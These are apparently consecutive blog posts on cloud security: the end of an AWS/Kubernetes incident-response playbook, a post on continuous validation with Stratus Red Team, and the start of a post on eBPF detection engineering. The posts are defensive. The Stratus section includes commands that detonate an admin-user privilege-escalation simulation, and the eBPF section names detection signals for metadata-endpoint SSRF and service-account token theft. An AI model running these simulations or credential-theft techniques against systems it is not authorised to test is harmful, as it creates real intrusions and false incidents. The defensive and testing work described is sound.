      --tag-specifications "ResourceType=snapshot,Tags=[{Key=incident,Value=active},{Key=preserve,Value=legal-hold}]"
  done

# Export CloudTrail logs for the incident window to a local IR evidence directory
# Use a time window that starts 24 hours before the suspected compromise
aws s3 sync \
  s3://your-cloudtrail-bucket/AWSLogs/123456789012/CloudTrail/ \
  ./ir-evidence/cloudtrail/ \
  --exclude "*" \
  --include "*/2024/02/21/*" \
  --include "*/2024/02/22/*"

# Export VPC Flow Logs for the incident window
# These show network connections that CloudTrail doesn't capture
aws logs filter-log-events \
  --log-group-name /aws/vpc/flowlogs \
  --start-time $(date -d '24 hours ago' +%s000) \
  --end-time $(date +%s000) \
  --query 'events[*].message' \
  --output text > ./ir-evidence/vpc-flow-logs.txt

Containment Action 1: Revoke the Compromised Credential

# Option A: Disable an IAM user's access key (reversible — preserves key for forensics)
aws iam update-access-key \
  --user-name compromised-user \
  --access-key-id AKIAIOSFODNN7EXAMPLE \
  --status Inactive

# Option B: If the compromised principal is an IAM role —
# attach a deny-all inline policy (fastest, takes effect immediately)
aws iam put-role-policy \
  --role-name compromised-role \
  --policy-name incident-deny-all \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [
      {
        "Sid": "IncidentDenyAll",
        "Effect": "Deny",
        "Action": "*",
        "Resource": "*"
      }
    ]
  }'

# Option C: If you need to revoke ALL active sessions for a role immediately
# (active STS sessions are not invalidated by the deny policy alone
#  until the session token expires — use this to force immediate revocation)
aws iam put-role-policy \
  --role-name compromised-role \
  --policy-name incident-deny-all \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [
      {
        "Effect": "Deny",
        "Action": "*",
        "Resource": "*",
        "Condition": {
          "DateLessThan": {
            "aws:TokenIssueTime": "'$(date --iso-8601=seconds)'"
          }
        }
      }
    ]
  }'
# This denies all requests where the token was issued before right now
# — effectively invalidating all existing sessions for this role

Containment Action 2: Isolate Affected EC2 Instances

# Create an isolation security group — no ingress, no egress
# except SSH from your IR bastion (for forensic access if needed)
ISOLATION_SG=$(aws ec2 create-security-group \
  --group-name "incident-isolation-$(date +%Y%m%d)" \
  --description "Incident isolation - no network access except IR bastion" \
  --vpc-id vpc-your-vpc-id \
  --query 'GroupId' \
  --output text)

echo "Isolation SG created: ${ISOLATION_SG}"

# Add ingress rule: only from IR bastion (for forensic access)
# Remove this rule entirely if you don't need it
aws ec2 authorize-security-group-ingress \
  --group-id "${ISOLATION_SG}" \
  --protocol tcp \
  --port 22 \
  --cidr YOUR-IR-BASTION-IP/32

# Apply the isolation SG to the compromised instance
# This replaces all existing security groups — the instance is now isolated
aws ec2 modify-instance-attribute \
  --instance-id i-compromised-instance-id \
  --groups "${ISOLATION_SG}"

Important: Do not terminate the instance. The isolated instance remains available for forensic analysis via the IR bastion. Termination destroys volatile evidence. You terminate after the investigation is complete and legal has cleared the evidence for destruction.

Containment Action 3: Kubernetes — Cordon, Don’t Delete

# Cordon the compromised node — prevents new pod scheduling
kubectl cordon node/compromised-node-name

# Label the node for IR tracking
kubectl label node/compromised-node-name incident=active preserve=legal-hold

# If a specific pod is the concern — do NOT kubectl delete pod
# Instead, collect forensic information first
POD_NAME="compromised-pod"
NAMESPACE="production"

# Capture the full pod spec and status
kubectl get pod "${POD_NAME}" -n "${NAMESPACE}" -o json > \
  ./ir-evidence/pod-spec-${POD_NAME}.json

# Capture environment variables (may contain credential evidence)
kubectl exec "${POD_NAME}" -n "${NAMESPACE}" -- env > \
  ./ir-evidence/pod-env-${POD_NAME}.txt 2>/dev/null

# Capture running processes
kubectl exec "${POD_NAME}" -n "${NAMESPACE}" -- ps auxf > \
  ./ir-evidence/pod-processes-${POD_NAME}.txt 2>/dev/null

# Capture network connections
kubectl exec "${POD_NAME}" -n "${NAMESPACE}" -- ss -tunapw > \
  ./ir-evidence/pod-netstat-${POD_NAME}.txt 2>/dev/null

# Now you can delete the pod if needed — you have the evidence

Hour 4–12: Investigate the Blast Radius

Containment stops the active threat. Investigation answers: what did they do, where did they go, and what did they touch?

Trace the Lateral Movement

The most important lateral movement mechanism in AWS is AssumeRole chaining — a compromised principal assumes a role, which has permissions to assume another role, building a privilege escalation path. IAM attack path reconstruction requires following this chain through CloudTrail.

# Find all AssumeRole events from the compromised principal
# This shows every role the attacker assumed after initial compromise
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
  --start-time "2024-02-21T00:00:00Z" \
  --end-time "2024-02-22T23:59:59Z" \
  --output json | \
  jq '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    select(.userIdentity.arn | contains("compromised-role")) | 
    {
      time: .eventTime,
      caller: .userIdentity.arn,
      assumed_role: .requestParameters.roleArn,
      session_name: .requestParameters.roleSessionName,
      source_ip: .sourceIPAddress
    }'

# Follow the chain — get ALL roles assumed during the incident window
# regardless of source, then trace connections manually
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
  --start-time "2024-02-21T00:00:00Z" \
  --end-time "2024-02-22T23:59:59Z" \
  --output json | \
  jq -r '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    [.eventTime, .userIdentity.arn, .requestParameters.roleArn, .sourceIPAddress] | 
    @tsv' | \
  sort -k1
# Build the graph manually: which ARN called AssumeRole for which target role
# Any role not in your expected deployment automation is suspicious

Find What Data Was Accessed

# S3 GetObject events — shows every object the attacker read
# NOTE: S3 data events are NOT enabled by default in CloudTrail
# If you haven't pre-enabled them, this query returns nothing useful
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=GetObject \
  --start-time "2024-02-21T00:00:00Z" \
  --end-time "2024-02-22T23:59:59Z" \
  --output json | \
  jq '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    {
      time: .eventTime,
      user: .userIdentity.arn,
      bucket: .requestParameters.bucketName,
      key: .requestParameters.key,
      source_ip: .sourceIPAddress
    }'

# Secrets Manager — what secrets were accessed?
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    {
      time: .eventTime,
      user: .userIdentity.arn,
      secret: .requestParameters.secretId,
      source_ip: .sourceIPAddress
    }'

# KMS — what was decrypted?
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=Decrypt \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    {
      time: .eventTime,
      user: .userIdentity.arn,
      key_id: .requestParameters.keyId,
      source_ip: .sourceIPAddress
    }'

Hunt for Persistence Mechanisms

Attackers establish persistence before detonating ransomware or before exfiltrating at scale. The most common persistence mechanisms in AWS:

# New IAM users created during the incident window
aws iam list-users \
  --query 'Users[?CreateDate>=`2024-02-21T00:00:00Z`].[UserName,CreateDate,UserId]' \
  --output table

# New IAM roles created during the incident window
aws iam list-roles \
  --query 'Roles[?CreateDate>=`2024-02-21T00:00:00Z`].[RoleName,CreateDate,RoleId]' \
  --output table

# New IAM access keys created for existing users
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=CreateAccessKey \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | (.CloudTrailEvent | fromjson) | {time: .eventTime, user: .requestParameters.userName, by: .userIdentity.arn}'

# Lambda functions with recent code modifications
# (Lambda is a common backdoor target — function code is easy to modify)
aws lambda list-functions \
  --query 'Functions[?LastModified>=`2024-02-21`].[FunctionName,LastModified,Runtime]' \
  --output table

# For any recently modified function — check for unexpected environment variables
aws lambda get-function-configuration \
  --function-name suspicious-function-name \
  --query '{env: Environment.Variables, role: Role, handler: Handler}'

# CloudFormation stacks created or modified during incident window
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=CreateStack \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | (.CloudTrailEvent | fromjson) | {time: .eventTime, stack: .requestParameters.stackName, by: .userIdentity.arn}'

# EC2 user-data modifications (backdoor via user data on restart)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=ModifyInstanceAttribute \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | (.CloudTrailEvent | fromjson) | select(.requestParameters | has("userData")) | {time: .eventTime, instance: .requestParameters.instanceId, by: .userIdentity.arn}'

eBPF and Falco Evidence (If Available)

If your environment runs Falco or Cilium Tetragon (see detection engineering with eBPF), the kernel-level telemetry from EP11 is now forensic evidence:

# Tetragon: export process execution events for the incident window
# Tetragon writes to /var/log/tetragon/tetragon.log by default
# Filter by the time window and affected pod/node

# On the affected node (or via log aggregation if you ship to a SIEM):
cat /var/log/tetragon/tetragon.log | \
  jq 'select(.time >= "2024-02-21T00:00:00Z" and .time <= "2024-02-22T23:59:59Z") |
    select(.process_exec != null) |
    {
      time: .time,
      pod: .process_exec.process.pod.name,
      ns: .process_exec.process.pod.namespace,
      binary: .process_exec.process.binary,
      args: .process_exec.process.arguments,
      parent: .process_exec.parent.binary
    }' | head -100

# Falco: pull alerts from the incident window out of your SIEM/log store
# If you're running Falco with file output:
grep "2024-02-21\|2024-02-22" /var/log/falco/events.json | \
  jq 'select(.priority == "Critical" or .priority == "Error") |
    {time: .time, rule: .rule, output: .output, pod: .output_fields."k8s.pod.name"}' | \
  head -50

Process lineage from Tetragon (which parent process spawned which child) is often the clearest signal of container escape or lateral movement within a cluster. It shows attack paths that API-layer logging cannot reconstruct.

Hour 12–24: Eradicate and Recover

Remove Persistence

Work through the persistence findings from the investigation phase in order:

# Delete unauthorized IAM users created during the incident
# First: disable their access keys
aws iam list-access-keys --user-name attacker-created-user \
  --query 'AccessKeyMetadata[].AccessKeyId' --output text | \
  tr '\t' '\n' | \
  while read key_id; do
    aws iam update-access-key --user-name attacker-created-user \
      --access-key-id "${key_id}" --status Inactive
  done

# Then: detach all policies, remove from groups, delete login profile, delete user
aws iam detach-user-policy --user-name attacker-created-user \
  --policy-arn arn:aws:iam::123456789012:policy/attached-policy
aws iam delete-user --user-name attacker-created-user

# Rotate ALL credentials that could have been accessed during the incident window
# Not just the initial compromise — every secret in the blast radius

# List all IAM user access keys in the affected account
aws iam list-users --query 'Users[].UserName' --output text | tr '\t' '\n' | \
  while read user; do
    aws iam list-access-keys --user-name "${user}" \
      --query 'AccessKeyMetadata[?Status==`Active`].{User:UserName,Key:AccessKeyId}' \
      --output json
  done | jq -s 'flatten'
# For each key: create new key → update application config → delete old key

# Remove Lambda backdoors — restore from last known-good deployment
# Do NOT patch the modified function — replace the entire deployment package
aws lambda update-function-code \
  --function-name backdoored-function \
  --s3-bucket your-code-bucket \
  --s3-key known-good/function-v1.2.3.zip

# Reset environment variables (remove anything added during incident)
aws lambda update-function-configuration \
  --function-name backdoored-function \
  --environment 'Variables={EXPECTED_VAR=expected_value}'

Replace Compromised Instances From Known-Good Baselines

Do not patch a compromised instance and return it to production. The instance’s integrity is unknown — the attacker may have modified binaries, installed kernel modules, or altered the init system in ways that a filesystem scan won’t catch.

Replace from a known-good hardened image:

# Launch a replacement from a hardened baseline AMI
# If you're running a Stratum-built image pipeline, this is where it pays off:
# you have a signed, hardened, versioned AMI to replace from

aws ec2 run-instances \
  --image-id ami-known-good-hardened-baseline \
  --instance-type t3.medium \
  --subnet-id subnet-your-private-subnet \
  --security-groups sg-your-normal-sg \
  --iam-instance-profile Name=your-instance-profile \
  --tag-specifications \
    'ResourceType=instance,Tags=[{Key=Name,Value=replacement-post-incident},{Key=incident-id,Value=2024-02-21}]' \
  --user-data file://init-script.sh

If you don’t have a hardened AMI pipeline, this incident is the forcing function to build one. Rebuilding from a generic AMI means re-running your full configuration management stack and hoping nothing drifts. Rebuilding from a known-good hardened baseline means launching and verifying.

Recovery Sequence

dev → staging → prod

Not prod first. Not all at once.

Bring dev back up. Verify monitoring and alerting are functional — specifically, verify that the detection that fired during this incident still fires in dev. If you can’t reproduce the detection in dev, you don’t know if it’s working.

Promote to staging. Run your standard smoke tests plus whatever you added to your detection suite based on this incident.

Promote to prod only after staging has been clean for at least four hours.

The Post-Incident Review

Schedule it within 72 hours of resolution. Not a blame session — a timeline reconstruction and process improvement meeting. What to document:

Timeline reconstruction (to the minute):

Time	Event	Who	Evidence Source
Feb 21 12:47	Initial compromise — credential used from unexpected IP	Attacker	CloudTrail
Feb 21 12:51	First AssumeRole to production role	Attacker	CloudTrail
Feb 21 13:15	S3 ListBuckets on customer-data bucket	Attacker	CloudTrail data events
Feb 21 21:30	GuardDuty fires: UnauthorizedAccess:IAMUser/AnomalousBehavior	GuardDuty	GuardDuty finding
Feb 21 21:35	On-call engineer acknowledges alert	SRE	PagerDuty
Feb 21 21:50	Incident declared, channel created	IR lead	Slack

Key metrics to measure and improve:

Mean Time to Detect (MTTD): Time between initial compromise and first alert
Mean Time to Declare (MTTDeclare): Time between first alert and formal incident declaration
Mean Time to Contain (MTTC): Time between declaration and credential revocation + network isolation
Blast radius: Accounts, services, data classifications confirmed in scope

Regulatory notification requirements (know these before the incident):

GDPR: 72 hours from discovery to supervisory authority notification
HIPAA: 60 days from discovery to individual notification; 60 days to HHS for breaches affecting 500+ individuals
CCPA: “expedient” notification to individuals; no fixed statutory window for regulator notification but AG guidance suggests 72 hours
SEC (public companies): 4 business days from determining the incident is “material”
Check your state breach notification laws — 50 states, 50 different windows

⚠ Production Gotchas

Revoking a credential mid-operation breaks running jobs. If the compromised IAM role is used by production services, the deny-all policy will immediately break those services. Have a plan for emergency credential rotation before you act — either a separate role for legitimate services or a maintenance window. The contain-vs-service-availability tradeoff is a real one; make it deliberately, document it in the incident log.

CloudTrail data events are not enabled by default. Management events (API calls like CreateUser, RunInstances, AssumeRole) are enabled. Data events (S3 GetObject, Lambda function invocations, DynamoDB item-level activity) must be explicitly enabled and cost extra. If you discover during an incident that you needed S3 data events and didn’t have them, you cannot reconstruct what data the attacker accessed. Enable them before the incident.

Forensic snapshots cost money. EBS snapshot storage is not free, and snapshotting every volume on every compromised instance adds up. Have a pre-approved IR budget that includes forensic snapshot costs — getting financial approval in the middle of an active incident is a delay you don’t want.

Legal hold means don’t delete anything. Once legal is involved, no evidence can be destroyed without legal clearance. That includes the compromised EC2 instances, the forensic snapshots, the log exports, and the incident Slack channel. Set legal-hold tags on all IR artifacts immediately and don’t clean up until legal explicitly says to.

The attacker may still be in. Containment removes one credential and one network path. If the attacker established multiple persistence mechanisms before you detected them, containment is the beginning of the eradication phase, not the end. Assume they’re still in until the persistence hunt is complete.

Multi-account blast radius compounds quickly. AssumeRole chains can cross account boundaries. A compromised role in account A that can assume a role in account B means the blast radius spans both accounts, and CloudTrail logging in account A does not show what the attacker did after assuming the role in account B. Pull CloudTrail from every account in the blast radius.

Quick Reference: IR Checklist — First 24 Hours

Hour 0–1: Declare and Scope

[ ] Declare incident — do not investigate quietly
[ ] Notify: CISO, Legal, on-call SRE lead
[ ] Create incident Slack channel: #incident-YYYY-MM-DD-descriptor
[ ] Start timestamped incident log (shared doc, assign scribe)
[ ] Query CloudTrail: last 1–2 hours of suspected principal activity
[ ] Check GuardDuty for active findings
[ ] Answer: active or historical? blast radius? data at risk?

Hour 1–4: Preserve, Then Contain

[ ] FIRST: Snapshot all volumes on compromised EC2 instances
[ ] FIRST: Export CloudTrail logs for incident window to IR evidence directory
[ ] FIRST: Export VPC Flow Logs for incident window
[ ] Revoke compromised IAM credential (disable key or attach deny-all policy)
[ ] For role sessions: use DateLessThan condition to invalidate active sessions
[ ] Apply isolation security group to compromised EC2 instances (do NOT terminate)
[ ] Cordon compromised Kubernetes nodes (do NOT delete pods before forensic capture)
[ ] Collect pod forensics: spec, env vars, process list, network connections

Hour 4–12: Investigate

[ ] Trace AssumeRole chain from compromised principal — build the lateral movement graph
[ ] Query S3 GetObject, GetSecretValue, Decrypt events for data access scope
[ ] Hunt persistence: new IAM users/roles, new access keys, Lambda modifications
[ ] Check EC2 user-data modifications, new CloudFormation stacks
[ ] Pull Tetragon/Falco evidence if available — process lineage and connection logs
[ ] Cross-account check: pull CloudTrail from every account reached via AssumeRole

Hour 12–24: Eradicate and Recover

[ ] Delete all unauthorized IAM users/roles/access keys created during incident
[ ] Rotate ALL credentials in the blast radius (not just the initial compromise)
[ ] Remove Lambda backdoors — replace entire deployment package, reset environment
[ ] Replace compromised instances from known-good hardened AMI (do not patch-in-place)
[ ] Recover: dev → staging → prod. Verify detection fires in dev before promoting.
[ ] Declare all-clear only after monitoring shows clean in prod for 4+ hours

Ongoing: Regulatory and Communication

[ ] Log discovery time — regulatory clocks (GDPR 72h, HIPAA 60d) start at discovery
[ ] Legal hold on all IR artifacts — do not delete without legal clearance
[ ] Schedule post-incident review within 72 hours of resolution
[ ] Update this playbook before the next incident

Key Takeaways

A cloud incident response playbook only works if it has been rehearsed before the incident — the ChangeHealthcare attack showed that nine days of undetected dwell time transforms a credential theft into a national healthcare disruption
Preserve before you contain: snapshot volumes and export logs before revoking credentials or isolating instances — forensic evidence destroyed during hasty containment cannot be reconstructed
The contain-vs-evidence tension is real and deliberate: isolated EC2 instances remain available for forensic access via IR bastion; terminated instances do not
CloudTrail data events (S3 GetObject, Lambda invocations) are not enabled by default — if you need them during an incident and haven’t pre-enabled them, your data access scope is unknown
Recovery sequence is dev → staging → prod, and you verify detection fires in dev before promoting — if you can’t reproduce the detection that caught the original incident, you don’t know if it still works

What’s Next

This playbook is reactive. You run it after something goes wrong. EP13 is about making it proactive — running structured attack simulations against your own infrastructure on a regular cadence so the first time your team works through this sequence is not during an actual breach. Continuous purple team testing means your IR team has muscle memory for the playbook, your detection tooling is validated against real attack patterns, and your blast radius assumptions are tested before an attacker tests them for you.

Get EP13 in your inbox when it publishes → subscribe at linuxcent.com

Continuous Security Validation: Proving Your Architecture Works

July 7, 2026 by Vamshi Krishna Santhapuri

Reading Time: 5 minutes

Zero to Hero: Cybersecurity Architecture Masterclass, Module 6
← Module 5: The Future of SecOps · Module 6: Continuous Mastery · All Masterclass Modules →

10 min read

TL;DR

Continuous security validation means running real attack techniques against your own production-equivalent environment on a schedule, not once a year during a pentest
stratus-red-team and Atomic Red Team execute specific, mapped MITRE ATT&CK techniques against live cloud infrastructure — the same IMDSv1 exploitation, IAM privilege escalation, and lateral-movement patterns covered earlier in this masterclass, but automated and repeatable
A validation run that never finds anything is either proof your controls work, or proof the simulation isn’t realistic enough — treat a clean run as a question, not a victory
Security culture is what determines whether a finding becomes a fixed control or a Jira ticket that ages out — validation without organizational follow-through is theater
The Feedback Loop closes the masterclass: every module (STRIDE, IAM hardening, immutable data, AI triage) becomes a control that continuous validation actually tests, instead of a design decision nobody revisits
This module doesn’t introduce new architecture — it’s the mechanism that proves Modules 1 through 5 are still true

Start Here: Run a Real Attack Technique Right Now

# Install Stratus Red Team — cloud-native attack technique simulator
$ brew install datadog/stratus-red-team/stratus-red-team

# List available techniques mapped to MITRE ATT&CK
$ stratus list --platform aws | grep -i iam
aws.credential-access.ec2-get-password-data
aws.privilege-escalation.iam-create-admin-user
aws.persistence.iam-create-user-login-profile

# Warm up (provisions the exact vulnerable-by-default resources
# Module 3 covered), detonate the technique, then clean up
$ stratus warmup aws.privilege-escalation.iam-create-admin-user
$ stratus detonate aws.privilege-escalation.iam-create-admin-user
$ stratus cleanup aws.privilege-escalation.iam-create-admin-user

That third command actually creates an admin IAM user the way an attacker would after a privilege-escalation exploit — against your own account, on a schedule you control, so your detection pipeline either catches it or you now know precisely where the gap is. This is continuous security validation: the difference between assuming GuardDuty would catch this and knowing it does, because you just watched it happen.

Why an Annual Pentest Isn’t Validation

A pentest is a snapshot, scoped to a window, executed by people who leave when the engagement ends. It tells you what was true for the systems in scope, on those specific days, against that specific team’s technique set. Everything this masterclass has covered — STRIDE-driven design changes (Module 2), IAM policy tightening (Module 3), WORM-locked backups (Module 4), AI-assisted triage (Module 5) — happens on a continuous basis, in a system that changes weekly. A control validated once in March and never tested again is a control you’re assuming still works in October.

Continuous security validation closes that gap by running the same specific techniques — not a generic scan, but named, MITRE ATT&CK-mapped attack behaviors — on a recurring schedule, against infrastructure that mirrors production. The goal isn’t finding something new every time. Most runs should find nothing, because most runs are re-confirming a control that was already fixed. That’s the point: continuous validation is regression testing for security posture.

Reading a Clean Run Correctly

A validation run that detonates a technique and triggers no alert is not automatically good news. It’s one of two things, and the difference matters:

 CLEAN RUN — TWO POSSIBLE EXPLANATIONS
 ───────────────────────────────────────────────────
 1. The control genuinely works.
    → GuardDuty/Tetragon/SIEM correctly detected and
      the alert pipeline correctly routed it — verify
      the alert actually fired and reached someone,
      not just that the technique "should have" tripped it.

 2. The simulation didn't actually exercise the real path.
    → Wrong region, wrong IAM role scope, a technique
      that's stale against current cloud provider APIs,
      or detection logic that's technically present but
      misconfigured for this specific technique variant.

Treat every clean run as a question — did the alert fire and get seen, or did nothing happen because nothing was really tested? Pulling the actual GuardDuty/SIEM record for the detonation timestamp and confirming a real alert exists, with the right severity, routed to the right channel, is the only way to tell these two outcomes apart. A validation program that only checks “did an incident occur” without checking “did the alert actually work” is measuring the wrong thing.

Mapping Continuous Security Validation Back to the Masterclass

Continuous validation is most useful when it directly re-tests the specific controls this series built, not a generic attack library run for its own sake:

Module	Control Being Tested	Example Validation Technique
M2 (STRIDE)	Trust boundary enforcement between services	Attempt lateral cross-service call that should be denied
M3 (Identity Perimeter)	IMDSv2 enforcement, IAM least privilege	`aws.privilege-escalation.iam-create-admin-user`, IMDSv1 credential theft simulation
M4 (Immutable Data)	Object Lock Compliance mode holds under attempted deletion	Attempt to delete/modify a WORM-locked backup object with admin credentials
M5 (AI Triage)	RAG pipeline correctly retrieves and cites relevant evidence for a simulated alert	Inject a known-pattern alert, verify the drafted summary cites the correct runbook

Running these specific, mapped checks on a schedule — weekly or per-deploy, not annually — is what separates continuous validation from a checklist audit. It’s also directly in the spirit of the attack-and-detect framing this site’s Purple Team series uses throughout: red team technique, blue team detection, purple team is the discipline of running both together on purpose.

The Part Tooling Can’t Fix: Security Culture

A validation run that surfaces a real gap and produces a Jira ticket that sits untouched for two quarters has not improved anything — it’s produced evidence of a known, unfixed gap, which is a worse position than not knowing. Continuous validation only works inside an organization where a finding routes to an owner, gets prioritized against other engineering work honestly (this is Module 2’s DREAD scoring, applied to validation findings instead of design-time threats), and gets re-tested after the fix ships to confirm it actually closed.

The Feedback Loop that closes this masterclass is this: Threat Model (M2) → Harden (M3/M4) → Validate (M6) → feed validation findings back into the next threat model. A gap continuous validation finds isn’t just a bug to fix — it’s a signal that the original threat model missed something, and the next STRIDE pass on that system should account for it explicitly.

Production Gotchas

Running attack simulations against shared/production environments without coordination causes real incidents. Detonating iam-create-admin-user against a live account without warning your own SOC produces a real, confusing incident response — schedule and announce validation runs the same way you’d announce a game day exercise.

Cleanup failures leave real vulnerable resources behind. stratus cleanup can fail silently if a dependent resource was modified mid-run — verify cleanup completed, don’t assume the tool always tears down what it created.

Technique libraries go stale as cloud provider APIs change. A technique written against an older IAM API surface may silently fail to actually reproduce the attack path — validate that a “no alert” result means the control held, not that the technique itself broke.

Validation findings that don’t map to an owning team die in a backlog. Route every finding to the specific service/team whose control failed, the same way you’d route a production incident — a finding owned by “security team, generally” doesn’t get fixed.

Framework Alignment

Framework	Control / ID	Architectural Mapping
NIST CSF 2.0	ID.IM-02	Improvements are identified from security tests and exercises, including continuous validation.
NIST SP 800-207	Zero Trust	Continuous validation is the operational proof that “continuous verification” (Module 1) is actually happening, not just designed.
ISO 27001:2022	8.29	Security testing in development and acceptance — extended here to continuous, production-equivalent testing.
SOC 2	CC4.1	The entity selects, develops, and performs ongoing evaluations to ascertain whether controls are present and functioning.

Key Takeaways

Continuous security validation runs specific, MITRE ATT&CK-mapped techniques against your own infrastructure on a schedule — not a once-a-year pentest
A clean run is ambiguous by default — confirm the alert actually fired and routed correctly, don’t assume the absence of an incident means the control worked
Map validation techniques directly back to the specific controls this masterclass built, not a generic attack library
Security culture — findings that route to an owner and get re-tested after the fix — is what makes validation matter; tooling alone doesn’t
The Feedback Loop is the masterclass’s actual conclusion: threat model, harden, validate, and feed what you learn back into the next threat model

What’s Next

That closes the six-module arc: from dismantling the castle-and-moat (Module 1), through systematic threat modeling (Module 2), hardening the cloud identity perimeter (Module 3), surviving ransomware with immutable data (Module 4), accelerating detection with AI (Module 5), to proving all of it actually holds (Module 6). The loop doesn’t end here — every validation finding is the start of the next threat model.

Get new masterclass content and future modules in your inbox → linuxcent.com/subscribe

Detection Engineering with eBPF: Kernel-Level Visibility for Cloud Incidents

July 6, 2026 by Vamshi Krishna Santhapuri

Reading Time: 13 minutes

TL;DR

Detection engineering with eBPF addresses OWASP A09 directly: most process-level attack techniques leave no trace in CloudTrail, VPC Flow Logs, or syslog — eBPF hooks in the kernel observe them before the attacker has any ability to suppress the record
CloudTrail is API-plane only; VPC Flow Logs are network-plane only with a 15-minute aggregation delay and no process context; syslog captures only what userspace processes voluntarily emit — all three miss the OS-level attack surface entirely
eBPF attaches to kernel syscall tracepoints and kprobes to capture connect(), execve(), mount(), setuid(), and open() with full context: PID, process name, container cgroup, parent process, timestamp — in real time
Falco and Tetragon are the production-grade always-on options; bpftrace is the ad-hoc investigation tool — use each for what it is designed for
Tetragon’s TracingPolicy can kill a process at the moment of the violating syscall, before the attack completes — this is enforcement, not just alerting
Every attack in EP07 through EP10 has a detectable kernel-level signal; this episode maps each one to a concrete eBPF detection rule

OWASP Mapping: A09 Security Logging and Monitoring Failures — the structural gap this series has referenced from EP04 onward: attacks that succeed not because defenses are absent, but because the telemetry layer cannot see the OS surface where the attacks execute.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│                  DETECTION ENGINEERING WITH eBPF                        │
│                                                                         │
│   KERNEL SPACE                          USERSPACE                       │
│                                                                         │
│   syscall/kprobe hooks                                                  │
│   ┌──────────────────┐                                                  │
│   │ connect()        │──▶ ring buffer ──▶ Tetragon ──▶ Hubble/SIEM     │
│   │ execve()         │                                                  │
│   │ mount()          │──▶ ring buffer ──▶ Falco   ──▶ Slack/PagerDuty │
│   │ setuid()         │                                                  │
│   │ open()           │──▶ perf buffer ──▶ bpftrace ──▶ stdout/log     │
│   └──────────────────┘                                                  │
│          │                                                              │
│          │  Context captured at hook:                                   │
│          │  PID · comm · cgroup (container ID) · args · timestamp      │
│          │  parent PID · network namespace · mount namespace           │
│                                                                         │
│   ═══════════════════════════════════════════════════════════           │
│   WHAT OTHER TOOLS SEE                                                  │
│   CloudTrail:     API calls only — nothing below the AWS SDK            │
│   VPC Flow Logs:  src/dst IP+port only — 15-min delay, no PID          │
│   Syslog:         What the process chose to log — attacker controls it  │
│   eBPF:           Every syscall — attacker cannot suppress it          │
│                   without kernel access                                 │
└─────────────────────────────────────────────────────────────────────────┘

Detection engineering with eBPF closes the observability gap that every previous episode in this series exploited. The SSRF in EP07 made an outbound connection to 169.254.169.254 — the EC2 metadata endpoint — from a web application process. VPC Flow Logs show that IP eventually. CloudTrail shows nothing. eBPF shows the connect() syscall with the PID, the process name, the container cgroup ID, and the timestamp, in the sub-millisecond window it occurred.

The Problem: Your SIEM Has a 15-Minute Hole

During a cloud incident response engagement, the question came up in the first hour: did this process make any outbound connections in the last 30 minutes?

Four telemetry sources, four answers:

CloudTrail: Not applicable. CloudTrail records AWS API calls. A process inside an EC2 instance making a raw TCP connection to an external IP — or to the metadata endpoint — is OS-level activity. CloudTrail has no record of it.

VPC Flow Logs: Maybe, eventually. Flow Logs aggregate at 1-minute or 10-minute intervals (configurable), then land in S3 or CloudWatch Logs with additional delay. In practice, you’re looking at 10–15 minutes before the data is queryable. The flow record contains source IP, destination IP, source port, destination port, protocol, bytes, packets — and nothing else. There is no PID. There is no process name. There is no indication of which container inside the EC2 instance made the connection. If ten pods are running on the same node, VPC Flow Logs tells you the node talked to an external IP. You don’t know which pod.

Syslog: Nothing logged. The process — a compromised web application exploited via SSRF — didn’t log the connection. It wouldn’t. Application code doesn’t emit syslog entries for every outbound connection it makes. And an attacker controlling the process would not add logging.

eBPF TC hook: Every TCP connection attempt, from the moment it entered the network stack, with PID, process name, container cgroup ID, destination IP, destination port, source IP, and timestamp — in real time, with zero delay.

That is the gap. Everything in EP04 through EP10 of this series lived in it.

The OWASP A09 framing is exactly right: these are not failures of detection rules, they are failures of the telemetry layer. You cannot write a SIEM rule for data that is never collected. eBPF collects the data that the other layers structurally cannot.

What eBPF Detects That Other Tools Miss

Technique	CloudTrail	VPC Flow Logs	Syslog	eBPF
Process spawn inside container	No	No	Maybe (if auditd configured)	Yes — execve(): PID, command, args, parent PID, container cgroup
Outbound TCP connection	No	IP+port, 15-min delay, no PID	No	connect(): IP+port+PID+comm+container, real-time
File write to /etc/passwd	No	No	No	openat()+write(): exact path, PID, comm, container
Privilege escalation (setuid/setgid)	No	No	Maybe (auditd)	Yes — setuid() syscall args: target UID, calling PID, comm
Container escape attempt via mount	No	No	No	mount(): args, mount namespace ID, calling PID — namespace mismatch detectable
SSRF to 169.254.169.254	No	IP only, 15-min delay	No	connect() from app process to metadata IP — PID, comm, container, real-time
Binary execution with unusual parent	No	No	No	execve(): full parent chain — detects shell spawned from web process
Kubernetes secret file read	No	No	No	openat() on /run/secrets/kubernetes.io/serviceaccount/token
STS credential fetch from Lambda	No	Endpoint IP only	No	connect() to sts.amazonaws.com from unexpected process

The pattern across the table is consistent: CloudTrail covers the AWS control plane. VPC Flow Logs cover the network plane with delay and no process context. Syslog covers what processes choose to emit. eBPF covers the syscall surface — the layer where every one of these events must pass, regardless of what the attacker wants.

